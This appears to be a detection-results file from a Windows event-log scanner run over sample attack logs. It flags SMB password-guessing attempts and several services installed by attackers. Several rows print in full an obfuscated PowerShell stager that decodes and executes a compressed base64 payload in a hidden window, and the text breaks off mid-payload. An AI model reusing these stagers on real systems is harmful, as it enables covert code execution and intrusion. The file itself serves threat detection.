Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1